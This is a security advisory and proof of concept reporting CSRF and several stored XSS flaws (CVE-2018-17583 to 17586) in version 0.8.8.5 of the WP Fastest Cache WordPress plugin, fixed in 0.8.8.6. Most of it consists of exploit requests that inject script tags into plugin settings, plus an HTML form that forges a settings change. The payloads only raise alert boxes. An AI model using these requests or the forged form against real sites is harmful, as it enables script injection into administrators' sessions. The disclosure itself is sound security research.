CSRF & Multiple Stored XSS in WP Fastest Cache plugin for WordPress - CVE-2018-17583 to CVE-2018-17586

Exploit Author: Mohammed Ansari S ( ansaert@gmail.com )

LinkedIn: https://www.linkedin.com/in/ansaert/

Tested Version: 0.8.8.5

Discovered Date: September 26 2018

Fixed Version: 0.8.8.6

Fixed Date: October 9 2018

Active installations:700,000+

Plugin: https://wordpress.org/plugins/wp-fastest-cache/

#1 - CVE-2018-17585 - XSS →  wpFastestCachePage options

Locate → http://localhost/wordpress/wp-admin/admin.php?page=wpfastestcacheoptions

Affected Vectors:

1. wpFastestCachePreload_number
2. wpFastestCacheLanguage

Exploit Request:

POST /wordpress/wp-admin/admin.php?page=wpfastestcacheoptions HTTP/1.1

wpFastestCachePreload_number=4<script>alert(1);</script>
wpFastestCacheLanguage=eng"><script>alert(2);</script>

#2 - CVE-2018-17586 - XSS - action → wpfc_save_timeout_pages

Affected Vectors:

1. rules[0][content]

Exploit Request:

POST /wordpress498/wp-admin/admin-ajax.php HTTP/1.1

rules%5B0%5D%5Bcontent%5D=%22%3E%3Cscript%3Ealert(3)%3B%3C%2Fscript%3E

#3 - CVE-2018-17583 - XSS - action → wpfc_save_exclude_pages

Affected Vectors:

1. rules[0][content]

Exploit Request:

POST /wordpress498/wp-admin/admin-ajax.php HTTP/1.1

rules%5B0%5D%5Bcontent%5D=%22%3E%3Cscript%3Ealert(4)%3B%3C%2Fscript%3E

#4 - CVE-2018-17584 - CSRF in page → wpfastestcacheoptions

1. Create *.html file

<form method="POST" action="http://localhost/wordpress/wp-admin/admin.php?page=wpfastestcacheoptions">

<input type="text" name="wpFastestCachePage" value="options"><br />

  <input type="text" name="wpFastestCachePreload_number" value="Enter the payload"><br />

<input type="text" name="wpFastestCacheLanguage" value="engEnter the payload"><br />

  <input type="text" name="submit" value="Save Changes"><br />

 <input type="submit">

</form>

Payload: "><script>alert(1);</script>